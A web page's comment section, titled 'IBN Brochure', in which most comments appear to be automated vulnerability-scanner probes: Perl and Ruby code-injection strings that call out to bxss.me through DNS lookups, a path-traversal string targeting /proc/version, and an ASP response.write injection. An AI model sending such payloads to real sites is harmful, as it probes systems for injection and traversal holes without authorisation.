19 Thoughts to “IBN Brochure”

 1. – How can I ever possibly thank you?: Làm thế nào tôi có thể cảm ơn bạn đây?

 2. 1

  ‘.gethostbyname(lc(‘hitwn’.’lsagrdnv61940.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(120).chr(70).chr(104).chr(72).’

 3. Anonymous

  ../../../../../../../../../../../../../../../proc/version

 4. Anonymous

  ^(#$!@#$)(()))******

 5. Anonymous

  “+”A”.concat(70-3).concat(22*4).concat(97).concat(71).concat(119).concat(76)+(require”socket”
  Socket.gethostbyname(“hitfy”+”emyqtemqd1b4d.bxss.me.”)[3].to_s)+”

 6. response.write(9920251*9851810)

Leave a Comment